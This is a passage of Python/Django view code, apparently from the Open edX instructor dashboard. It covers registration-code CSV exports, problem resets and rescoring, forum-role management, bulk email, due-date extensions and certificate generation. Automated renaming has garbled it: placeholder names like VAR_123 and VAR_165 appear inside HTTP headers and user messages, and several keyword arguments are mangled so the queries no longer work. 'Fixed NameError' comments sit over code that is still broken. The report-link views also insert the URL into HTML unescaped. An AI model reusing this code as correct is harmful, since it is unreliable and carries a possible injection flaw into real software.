    return FUNC_34("Active_Registration_Codes.csv", VAR_120)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@require_POST
def FUNC_39(VAR_9, VAR_10):
    """
    Download the redeemed ('spent') registration codes as CSV, optionally
    narrowed to the POSTed company name.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_121 = RegistrationCodeRedemption.objects.select_related('registration_code').filter(
        registration_code__course_id=VAR_10
    )
    VAR_122 = []
    if VAR_121.exists():
        VAR_184 = [VAR_82.registration_code.code for VAR_82 in VAR_121]
        # Fixed NameError: the filter value referenced undefined `course_id`.
        VAR_122 = CourseRegistrationCode.objects.filter(
            VAR_10=VAR_10, code__in=VAR_184
        ).order_by('invoice_item__invoice__company_name').select_related('invoice_item__invoice')
    VAR_88 = VAR_9.POST['spent_company_name']
    if VAR_88:
        # Fixed NameError: `spent_codes_list` was undefined; filter the
        # queryset built above. (As before, a company filter with no
        # redemptions at all would hit the empty-list default.)
        VAR_122 = VAR_122.filter(invoice_item__invoice__company_name=VAR_88)  # pylint: disable=maybe-no-member
    VAR_34 = 'spent'
    return FUNC_34("Spent_Registration_Codes.csv", VAR_122, VAR_34)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_40(VAR_9, VAR_10):  # pylint: disable=unused-argument
    """
    Download a CSV mapping enrolled users' ids to their anonymized ids
    (global and course-specific) for the course.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)

    def FUNC_86(VAR_123, VAR_86, VAR_124):
        """Stream a header row plus data rows out as a UTF-8 CSV attachment."""
        response = HttpResponse(content_type='text/csv')
        response['Content-Disposition'] = 'attachment; VAR_123={0}'.format(unicode(VAR_123).encode('utf-8'))
        writer = VAR_26.writer(response, dialect='excel', quotechar='"', quoting=VAR_26.QUOTE_ALL)
        writer.writerow([unicode(s).encode('utf-8') for s in VAR_86])
        for row in VAR_124:
            writer.writerow([unicode(s).encode('utf-8') for s in row])
        return response

    enrolled_students = User.objects.filter(
        courseenrollment__course_id=VAR_10,
    ).order_by('id')
    header = ['User ID', 'Anonymized User ID', 'Course Specific Anonymized User ID']
    rows = [
        [s.id, unique_id_for_user(s, save=False), anonymous_id_for_user(s, VAR_10, save=False)]
        for s in enrolled_students
    ]
    return FUNC_86(VAR_10.to_deprecated_string().replace('/', '-') + '-anon-ids.csv', header, rows)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_0
@FUNC_3('staff')
@FUNC_1(
    VAR_141="email or VAR_15 of VAR_40 for whom to get progress url"
)
def FUNC_41(VAR_9, VAR_10):
    """Return JSON containing the progress-page URL for the identified student."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    student = get_student_from_identifier(VAR_9.GET.get('unique_student_identifier'))
    progress_url = reverse('student_progress', VAR_3={'course_id': VAR_10.to_deprecated_string(), 'student_id': student.id})
    return JsonResponse({
        'course_id': VAR_10.to_deprecated_string(),
        'progress_url': progress_url,
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1(
    VAR_127="problem urlname to reset"
)
@FUNC_0
def FUNC_42(VAR_9, VAR_10):
    """
    Reset a student's attempts (or delete their module state) for one
    problem, or reset attempts for all students via a background task.

    all_students and the student identifier are mutually exclusive, as are
    all_students and delete_module; all-student / delete operations require
    instructor-level access.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_65 = get_course_with_access(
        VAR_9.user, 'staff', VAR_10, depth=None
    )
    VAR_127 = strip_if_string(VAR_9.GET.get('problem_to_reset'))
    VAR_128 = VAR_9.GET.get('unique_student_identifier', None)
    VAR_40 = None
    if VAR_128 is not None:
        VAR_40 = get_student_from_identifier(VAR_128)
    VAR_129 = VAR_9.GET.get('all_students', False) in ['true', 'True', True]
    VAR_130 = VAR_9.GET.get('delete_module', False) in ['true', 'True', True]
    if VAR_129 and VAR_40:
        return HttpResponseBadRequest(
            "all_students and VAR_141 are mutually exclusive."
        )
    if VAR_129 and VAR_130:
        return HttpResponseBadRequest(
            "all_students and VAR_130 are mutually exclusive."
        )
    if VAR_129 or VAR_130:
        if not has_access(VAR_9.user, 'instructor', VAR_65):
            return HttpResponseForbidden("Requires instructor VAR_165.")
    try:
        VAR_188 = VAR_10.make_usage_key_from_deprecated_string(VAR_127)
    except InvalidKeyError:
        return HttpResponseBadRequest()
    VAR_63 = {}
    # Fixed NameError: was `response_payload[...]`, a name never bound.
    VAR_63['problem_to_reset'] = VAR_127
    if VAR_40:
        try:
            enrollment.reset_student_attempts(
                VAR_10,
                VAR_40,
                VAR_188,
                requesting_user=VAR_9.user,
                VAR_130=VAR_130
            )
        except StudentModule.DoesNotExist:
            return HttpResponseBadRequest(_("Module does not exist."))
        except sub_api.SubmissionError:
            VAR_208 = _("An VAR_169 occurred while deleting the score.")
            return HttpResponse(VAR_208, status=500)
        VAR_63['student'] = VAR_128
    elif VAR_129:
        instructor_task.api.submit_reset_problem_attempts_for_all_students(VAR_9, VAR_188)
        VAR_63['task'] = 'created'
        VAR_63['student'] = 'All Students'
    else:
        return HttpResponseBadRequest()
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_0
def FUNC_43(VAR_9, VAR_10):  # pylint: disable=invalid-VAR_16
    """
    Reset a student's entrance-exam problem attempts, or delete their
    entrance-exam state, via a background task.

    Rejects mutually exclusive flag combinations (all_students with a
    student identifier, or all_students with delete_module); all-student
    and delete operations require instructor-level access.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_65 = get_course_with_access(
        VAR_9.user, 'staff', VAR_10, depth=None
    )
    # No entrance exam configured: nothing to reset.
    if not VAR_65.entrance_exam_id:
        return HttpResponseBadRequest(
            _("Course has no entrance exam VAR_39.")
        )
    VAR_128 = VAR_9.GET.get('unique_student_identifier', None)
    VAR_40 = None
    if VAR_128 is not None:
        VAR_40 = get_student_from_identifier(VAR_128)
    VAR_129 = VAR_9.GET.get('all_students', False) in ['true', 'True', True]
    VAR_130 = VAR_9.GET.get('delete_module', False) in ['true', 'True', True]
    # Validate flag combinations before doing any work.
    if VAR_129 and VAR_40:
        return HttpResponseBadRequest(
            _("all_students and VAR_141 are mutually exclusive.")
        )
    if VAR_129 and VAR_130:
        return HttpResponseBadRequest(
            _("all_students and VAR_130 are mutually exclusive.")
        )
    # Broad or destructive operations need instructor (not just staff) access.
    if VAR_129 or VAR_130:
        if not has_access(VAR_9.user, 'instructor', VAR_65):
            return HttpResponseForbidden(_("Requires instructor VAR_165."))
    try:
        VAR_189 = VAR_10.make_usage_key_from_deprecated_string(VAR_65.entrance_exam_id)
        if VAR_130:
            instructor_task.api.submit_delete_entrance_exam_state_for_student(VAR_9, VAR_189, VAR_40)
        else:
            instructor_task.api.submit_reset_problem_attempts_in_entrance_exam(VAR_9, VAR_189, VAR_40)
    except InvalidKeyError:
        return HttpResponseBadRequest(_("Course has no valid entrance exam VAR_39."))
    VAR_63 = {'student': VAR_128 or _('All Students'), 'task': 'created'}
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('instructor')
@FUNC_1(VAR_127="problem urlname to reset")
@FUNC_0
def FUNC_44(VAR_9, VAR_10):
    """
    Rescore one problem for a single student or for all students via a
    background task. Requires either a student identifier or all_students
    (but not both).
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_127 = strip_if_string(VAR_9.GET.get('problem_to_reset'))
    VAR_128 = VAR_9.GET.get('unique_student_identifier', None)
    VAR_40 = None
    if VAR_128 is not None:
        VAR_40 = get_student_from_identifier(VAR_128)
    VAR_129 = VAR_9.GET.get('all_students') in ['true', 'True', True]
    if not (VAR_127 and (VAR_129 or VAR_40)):
        return HttpResponseBadRequest("Missing query parameters.")
    if VAR_129 and VAR_40:
        return HttpResponseBadRequest(
            "Cannot rescore with VAR_129 and VAR_141."
        )
    try:
        VAR_188 = VAR_10.make_usage_key_from_deprecated_string(VAR_127)
    except InvalidKeyError:
        return HttpResponseBadRequest("Unable to parse problem id")
    VAR_63 = {}
    # Fixed NameError: was `response_payload[...]`, a name never bound.
    VAR_63['problem_to_reset'] = VAR_127
    if VAR_40:
        VAR_63['student'] = VAR_128
        instructor_task.api.submit_rescore_problem_for_student(VAR_9, VAR_188, VAR_40)
        VAR_63['task'] = 'created'
    elif VAR_129:
        instructor_task.api.submit_rescore_problem_for_all_students(VAR_9, VAR_188)
        VAR_63['task'] = 'created'
    else:
        return HttpResponseBadRequest()
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('instructor')
@FUNC_0
def FUNC_45(VAR_9, VAR_10):
    """
    Rescore the course's entrance exam for one student or (when
    all_students is set) for everyone, via a background task.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    course = get_course_with_access(
        VAR_9.user, 'staff', VAR_10, depth=None
    )
    student_identifier = VAR_9.GET.get('unique_student_identifier', None)
    student = None
    if student_identifier is not None:
        student = get_student_from_identifier(student_identifier)
    all_students = VAR_9.GET.get('all_students') in ['true', 'True', True]
    if not course.entrance_exam_id:
        return HttpResponseBadRequest(
            _("Course has no entrance exam VAR_39.")
        )
    if all_students and student:
        return HttpResponseBadRequest(
            _("Cannot rescore with VAR_129 and VAR_141.")
        )
    try:
        exam_usage_key = VAR_10.make_usage_key_from_deprecated_string(course.entrance_exam_id)
    except InvalidKeyError:
        return HttpResponseBadRequest(_("Course has no valid entrance exam VAR_39."))
    payload = {}
    payload['student'] = student_identifier if student else _("All Students")
    instructor_task.api.submit_rescore_entrance_exam_for_student(VAR_9, exam_usage_key, student)
    payload['task'] = 'created'
    return JsonResponse(payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_46(VAR_9, VAR_10):  # pylint: disable=unused-argument
    """List bulk-course-email background tasks for the course as JSON."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_131 = 'bulk_course_email'
    # Fixed NameError: keyword value referenced undefined `task_type`.
    VAR_132 = instructor_task.api.get_instructor_task_history(VAR_10, VAR_131=VAR_131)
    VAR_63 = {
        'tasks': map(extract_task_features, VAR_132),
    }
    return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_47(VAR_9, VAR_10):  # pylint: disable=unused-argument
    """List sent bulk course emails for the course as JSON."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_131 = 'bulk_course_email'
    # Fixed NameError: keyword value referenced undefined `task_type`.
    VAR_133 = instructor_task.api.get_instructor_task_history(VAR_10, VAR_131=VAR_131)
    VAR_63 = {
        'emails': map(extract_email_features, VAR_133),
    }
    return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_48(VAR_9, VAR_10):
    """
    List instructor tasks as JSON: running tasks by default, or the task
    history for a problem and (optionally) one student.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    problem_location = strip_if_string(VAR_9.GET.get('problem_location_str', False))
    student = VAR_9.GET.get('unique_student_identifier', None)
    if student is not None:
        student = get_student_from_identifier(student)
    if student and not problem_location:
        return HttpResponseBadRequest(
            "unique_student_identifier must accompany problem_location_str"
        )
    if problem_location:
        try:
            usage_key = VAR_10.make_usage_key_from_deprecated_string(problem_location)
        except InvalidKeyError:
            return HttpResponseBadRequest()
        if student:
            tasks = instructor_task.api.get_instructor_task_history(VAR_10, usage_key, student)
        else:
            tasks = instructor_task.api.get_instructor_task_history(VAR_10, usage_key)
    else:
        tasks = instructor_task.api.get_running_instructor_tasks(VAR_10)
    return JsonResponse({
        'tasks': map(extract_task_features, tasks),
    })
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_49(VAR_9, VAR_10):  # pylint: disable=invalid-VAR_16
    """
    List entrance-exam instructor task history for the course (optionally
    for one student) as JSON.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    course = get_course_by_id(VAR_10)
    student = VAR_9.GET.get('unique_student_identifier', None)
    if student is not None:
        student = get_student_from_identifier(student)
    try:
        exam_usage_key = VAR_10.make_usage_key_from_deprecated_string(course.entrance_exam_id)
    except InvalidKeyError:
        return HttpResponseBadRequest(_("Course has no valid entrance exam VAR_39."))
    if student:
        tasks = instructor_task.api.get_entrance_exam_instructor_task_history(VAR_10, exam_usage_key, student)
    else:
        tasks = instructor_task.api.get_entrance_exam_instructor_task_history(VAR_10, exam_usage_key)
    return JsonResponse({
        'tasks': map(extract_task_features, tasks),
    })
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_50(VAR_35, VAR_10):
    """List available grade-report downloads (name, url, anchor link) as JSON."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_135 = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
    VAR_63 = {
        'downloads': [
            # Fixed NameError: values referenced undefined `name` / `url`
            # instead of the loop variables.
            dict(VAR_16=VAR_16, VAR_147=VAR_147, link=HTML('<a href="{}">{}</a>').format(HTML(VAR_147), Text(VAR_16)))
            for VAR_16, VAR_147 in VAR_135.links_for(VAR_10)
        ]
    }
    return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_6
def FUNC_51(VAR_35, VAR_10):
    """List available financial-report downloads (name, url, anchor link) as JSON."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_135 = ReportStore.from_config(config_name='FINANCIAL_REPORTS')
    VAR_63 = {
        'downloads': [
            # Fixed NameError: values referenced undefined `name` / `url`
            # instead of the loop variables.
            dict(VAR_16=VAR_16, VAR_147=VAR_147, link=HTML('<a href="{}">{}</a>').format(HTML(VAR_147), Text(VAR_16)))
            for VAR_16, VAR_147 in VAR_135.links_for(VAR_10)
        ]
    }
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_52(VAR_9, VAR_10):
    """Submit the asynchronous ORA2 data-export task and report status as JSON."""
    course_key = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        instructor_task.api.submit_export_ora2_data(VAR_9, course_key)
    except AlreadyRunningError:
        already_running_status = _(
            "An ORA VAR_192 report generation VAR_150 is already in "
            "progress. Check the 'Pending Tasks' table "
            "for the status of the VAR_150. When completed, the report "
            "will be available for download in the table below."
        )
        return JsonResponse({"status": already_running_status})
    return JsonResponse({"status": _("The ORA VAR_192 report is being generated.")})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_53(VAR_9, VAR_10):
    """Submit the asynchronous grade-report CSV task and report status as JSON."""
    course_key = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        instructor_task.api.submit_calculate_grades_csv(VAR_9, course_key)
    except AlreadyRunningError:
        already_running_status = _(
            "The grade report is currently being VAR_149."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
        return JsonResponse({"status": already_running_status})
    started_status = _(
        "The grade report is being VAR_149."
        " To view the status of the report, see Pending Tasks below."
    )
    return JsonResponse({"status": started_status})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_54(VAR_9, VAR_10):
    """Submit the asynchronous problem-grade report task and report status as JSON."""
    course_key = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        instructor_task.api.submit_problem_grade_report(VAR_9, course_key)
    except AlreadyRunningError:
        already_running_status = _(
            "A problem grade report is already being generated."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
        return JsonResponse({
            "status": already_running_status
        })
    started_status = _(
        "The problem grade report is being VAR_149."
        " To view the status of the report, see Pending Tasks below."
    )
    return JsonResponse({"status": started_status})
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1('rolename')
def FUNC_55(VAR_9, VAR_10):
    """
    List members of a forum role for the course as JSON. Listing the
    administrator role requires instructor access; unrecognized role names
    are rejected.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    course = get_course_by_id(VAR_10)
    is_instructor = has_access(VAR_9.user, 'instructor', course)
    is_forum_admin = has_forum_access(
        VAR_9.user, VAR_10, FORUM_ROLE_ADMINISTRATOR
    )
    rolename = VAR_9.GET.get('rolename')
    if not (is_forum_admin or is_instructor):
        return HttpResponseBadRequest(
            "Operation requires staff & forum admin or instructor access"
        )
    if rolename == FORUM_ROLE_ADMINISTRATOR and not is_instructor:
        return HttpResponseBadRequest("Operation requires instructor VAR_165.")
    if rolename not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
        return HttpResponseBadRequest(strip_tags(
            "Unrecognized VAR_64 '{}'.".format(rolename)
        ))
    try:
        role = Role.objects.get(VAR_16=rolename, VAR_10=VAR_10)
        role_members = role.users.all().order_by('username')
    except Role.DoesNotExist:
        role_members = []

    def FUNC_85(VAR_19):
        """Flatten a user object into the fields the dashboard displays."""
        return {
            'username': VAR_19.username,
            'email': VAR_19.email,
            'first_name': VAR_19.first_name,
            'last_name': VAR_19.last_name,
        }

    return JsonResponse({
        'course_id': VAR_10.to_deprecated_string(),
        rolename: map(FUNC_85, role_members),
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_2(send_to="sending to whom", VAR_115="subject line", VAR_74="message text")
def FUNC_56(VAR_9, VAR_10):
    """
    Create a bulk course email from the POSTed send_to/subject/message and
    submit the send task; 403 when bulk email is disabled for the course.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    if not BulkEmailFlag.feature_enabled(VAR_10):
        return HttpResponseForbidden("Email is not enabled for this VAR_65.")
    VAR_138 = json.loads(VAR_9.POST.get("send_to"))
    VAR_115 = VAR_9.POST.get("subject")
    VAR_74 = VAR_9.POST.get("message")
    VAR_139 = microsite.get_value('course_email_template_name')
    VAR_140 = microsite.get_value('course_email_from_addr')
    try:
        VAR_14 = CourseEmail.create(
            VAR_10,
            VAR_9.user,
            VAR_138,
            VAR_115, VAR_74,
            # Fixed NameError: values referenced undefined `template_name`
            # and `from_addr`; use the microsite values fetched above.
            VAR_139=VAR_139,
            VAR_140=VAR_140
        )
    except ValueError as err:
        return HttpResponseBadRequest(repr(err))
    instructor_task.api.submit_bulk_course_email(VAR_9, VAR_10, VAR_14.id)
    VAR_63 = {
        'course_id': VAR_10.to_deprecated_string(),
        'success': True,
    }
    return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1(
    VAR_141="email or VAR_15 of VAR_19 to change access",
    VAR_64="the forum role",
    VAR_57="'allow' or 'revoke'",
)
@FUNC_0
def FUNC_57(VAR_9, VAR_10):
    """
    Allow or revoke a user's forum role for the course. Modifying the
    administrator role requires instructor access; unrecognized role names
    are rejected.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    course = get_course_by_id(VAR_10)
    is_instructor = has_access(VAR_9.user, 'instructor', course)
    is_forum_admin = has_forum_access(
        VAR_9.user, VAR_10, FORUM_ROLE_ADMINISTRATOR
    )
    identifier = VAR_9.GET.get('unique_student_identifier')
    rolename = VAR_9.GET.get('rolename')
    action = VAR_9.GET.get('action')
    if not (is_forum_admin or is_instructor):
        return HttpResponseBadRequest(
            "Operation requires staff & forum admin or instructor access"
        )
    if rolename == FORUM_ROLE_ADMINISTRATOR and not is_instructor:
        return HttpResponseBadRequest("Operation requires instructor VAR_165.")
    if rolename not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
        return HttpResponseBadRequest(strip_tags(
            "Unrecognized VAR_64 '{}'.".format(rolename)
        ))
    target_user = get_student_from_identifier(identifier)
    try:
        update_forum_role(VAR_10, target_user, rolename, action)
    except Role.DoesNotExist:
        return HttpResponseBadRequest("Role does not exist.")
    return JsonResponse({
        'course_id': VAR_10.to_deprecated_string(),
        'action': action,
    })
@require_POST
def FUNC_58(VAR_9, VAR_10):  # pylint: disable=unused-argument
    """
    Return JSON saying whether the requesting user wants a copy of sale
    invoices (stored user preference; defaults to True when unset).
    """
    invoice_copy = True
    stored_preference = get_user_preference(VAR_9.user, INVOICE_KEY)
    if stored_preference is not None:
        invoice_copy = stored_preference == 'True'
    return JsonResponse({
        'invoice_copy': invoice_copy
    })
def FUNC_59(VAR_36):
    """
    Human-readable label for a unit: 'display_name (location)' when the
    unit has a display name, otherwise just its location string.
    """
    location_string = VAR_36.location.to_deprecated_string()
    display_name = getattr(VAR_36, 'display_name', None)
    if display_name:
        return u'{0} ({1})'.format(display_name, location_string)
    return location_string
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1('student', 'url', 'due_datetime')
def FUNC_60(VAR_9, VAR_10):
    """Grant a single student a due-date extension on one unit."""
    course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
    student = require_student_from_identifier(VAR_9.GET.get('student'))
    unit = find_unit(course, VAR_9.GET.get('url'))
    due_date = parse_datetime(VAR_9.GET.get('due_datetime'))
    set_due_date_extension(course, unit, student, due_date)
    return JsonResponse(_(
        'Successfully changed due date for VAR_40 {0} for {1} '
        'to {2}').format(student.profile.name, FUNC_59(unit),
                         due_date.strftime('%Y-%m-%d %H:%M')))
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1('student', 'url')
def FUNC_61(VAR_9, VAR_10):
    """
    Clear a student's due-date extension on one unit, reverting to the
    unit's own due date (or reporting when the unit has none).
    """
    course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
    student = require_student_from_identifier(VAR_9.GET.get('student'))
    unit = find_unit(course, VAR_9.GET.get('url'))
    set_due_date_extension(course, unit, student, None)
    if not getattr(unit, "due", None):
        return JsonResponse(
            _("Successfully removed invalid due date extension (VAR_36 has no due date).")
        )
    original_due_date = unit.due.strftime('%Y-%m-%d %H:%M')
    return JsonResponse(_(
        'Successfully reset due date for VAR_40 {0} for {1} '
        'to {2}').format(student.profile.name, FUNC_59(unit),
                         original_due_date))
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1('url')
def FUNC_62(VAR_9, VAR_10):
    """Return JSON listing all due-date extensions granted on one unit."""
    course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
    unit = find_unit(course, VAR_9.GET.get('url'))
    return JsonResponse(dump_module_extensions(course, unit))
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1('student')
def FUNC_63(VAR_9, VAR_10):
    """Return JSON listing all due-date extensions granted to one student."""
    student = require_student_from_identifier(VAR_9.GET.get('student'))
    course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
    return JsonResponse(dump_student_extensions(course, student))
def FUNC_64(VAR_37):
    """Split a raw string on commas/whitespace/newlines into non-empty trimmed tokens."""
    stripped = (piece.strip() for piece in re.split(r'[\n\r\s,]', VAR_37))
    return [token for token in stripped if token != '']
def FUNC_65(VAR_38, VAR_39=None):
    """
    Return the instructor-dashboard URL for course VAR_38, optionally
    anchored at section VAR_39 (e.g. '#view-certificates').
    """
    VAR_147 = reverse('instructor_dashboard', VAR_3={'course_id': unicode(VAR_38)})
    if VAR_39 is not None:
        # Fixed NameError: the format value referenced undefined `section`.
        VAR_147 += u'#view-{VAR_39}'.format(VAR_39=VAR_39)
    return VAR_147
@FUNC_4
@require_POST
def FUNC_66(VAR_9, VAR_10=None):  # pylint: disable=unused-argument
    """Kick off example-certificate generation, then redirect to the dashboard's certificates section."""
    course_key = CourseKey.from_string(VAR_10)
    certs_api.generate_example_certificates(course_key)
    return redirect(FUNC_65(course_key, VAR_39='certificates'))
@FUNC_4
@require_POST
def FUNC_67(VAR_9, VAR_10=None):
    """Enable or disable certificate generation per the POSTed flag, then redirect to the dashboard."""
    course_key = CourseKey.from_string(VAR_10)
    enable_generation = VAR_9.POST.get('certificates-enabled', 'false') == 'true'
    certs_api.set_cert_generation_enabled(course_key, enable_generation)
    return redirect(FUNC_65(course_key, VAR_39='certificates'))
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@require_POST
def FUNC_68(VAR_9, VAR_10):  # pylint: disable=invalid-VAR_16
    """Mark a student as allowed to skip the course's entrance exam (idempotent)."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    student_identifier = VAR_9.POST.get('unique_student_identifier')
    student = get_student_from_identifier(student_identifier)
    __, newly_created = EntranceExamConfiguration.objects.get_or_create(VAR_19=student, VAR_10=VAR_10)
    if newly_created:
        message = _('This VAR_40 (%s) will skip the entrance exam.') % student_identifier
    else:
        message = _('This VAR_40 (%s) is already allowed to skip the entrance exam.') % student_identifier
    return JsonResponse({
        'message': message,
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_POST
def FUNC_69(VAR_9, VAR_10):
    """Start a background task generating certificates for all students."""
    course_key = CourseKey.from_string(VAR_10)
    task = instructor_task.api.generate_certificates_for_students(VAR_9, course_key)
    message = _('Certificate generation VAR_150 for all VAR_125 of this VAR_65 has been started. '
                'You can view the status of the generation VAR_150 in the "Pending Tasks" VAR_39.')
    return JsonResponse({
        'message': message,
        'task_id': task.task_id
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_POST
def FUNC_70(VAR_9, VAR_10):
    """Start a certificate-regeneration task for the selected statuses.

    Validates the POSTed ``certificate_statuses`` list (must be non-empty
    and a subset of the allowed statuses) before queueing the task.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    VAR_151 = VAR_9.POST.getlist('certificate_statuses', [])
    if not VAR_151:
        return JsonResponse(
            {'message': _('Please select one or more VAR_163 statuses that require VAR_163 regeneration.')},
            status=400
        )
    # Only these terminal statuses are eligible for regeneration.
    VAR_152 = [CertificateStatuses.downloadable, CertificateStatuses.error, CertificateStatuses.notpassing]
    if not set(VAR_151).issubset(VAR_152):
        return JsonResponse(
            {'message': _('Please select VAR_163 statuses from the list only.')},
            status=400
        )
    try:
        instructor_task.api.regenerate_certificates(VAR_9, VAR_38, VAR_151)
    except AlreadyRunningError as VAR_169:
        # NOTE: ``.message`` is a Python 2 exception attribute.
        return JsonResponse({'message': VAR_169.message}, status=400)
    VAR_63 = {
        'message': _('Certificate regeneration VAR_150 has been started. '
                     'You can view the status of the generation VAR_150 in the "Pending Tasks" VAR_39.'),
        'success': True
    }
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_http_methods(['POST', 'DELETE'])
def FUNC_71(VAR_9, VAR_10):
    """Add (POST) or remove (DELETE) a certificate-exception entry.

    The JSON request body identifies the student; validation failures are
    returned as a 400 JSON response carrying a ``message``.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    try:
        VAR_41, VAR_40 = FUNC_74(VAR_9, VAR_38)  # (parsed payload, resolved student)
    except ValueError as VAR_169:
        return JsonResponse({'success': False, 'message': VAR_169.message}, status=400)
    if VAR_9.method == 'POST':
        try:
            VAR_154 = FUNC_72(VAR_38, VAR_40, VAR_41)
        except ValueError as VAR_169:
            return JsonResponse({'success': False, 'message': VAR_169.message}, status=400)
        return JsonResponse(VAR_154)
    elif VAR_9.method == 'DELETE':
        try:
            FUNC_73(VAR_38, VAR_40)
        except ValueError as VAR_169:
            return JsonResponse({'success': False, 'message': VAR_169.message}, status=400)
        # 204: exception removed, nothing to return.
        return JsonResponse({}, status=204)
def FUNC_72(VAR_38, VAR_40, VAR_41):
    """Add ``VAR_40`` to the certificate white list of course ``VAR_38``.

    Raises ``ValueError`` when the student is already white-listed; returns
    a dict describing the new entry for the dashboard UI.
    """
    if len(CertificateWhitelist.get_certificate_white_list(VAR_38, VAR_40)) > 0:
        raise ValueError(
            _("Student (VAR_15/VAR_14={VAR_19}) already in VAR_163 VAR_154 list.").format(VAR_19=VAR_40.username)
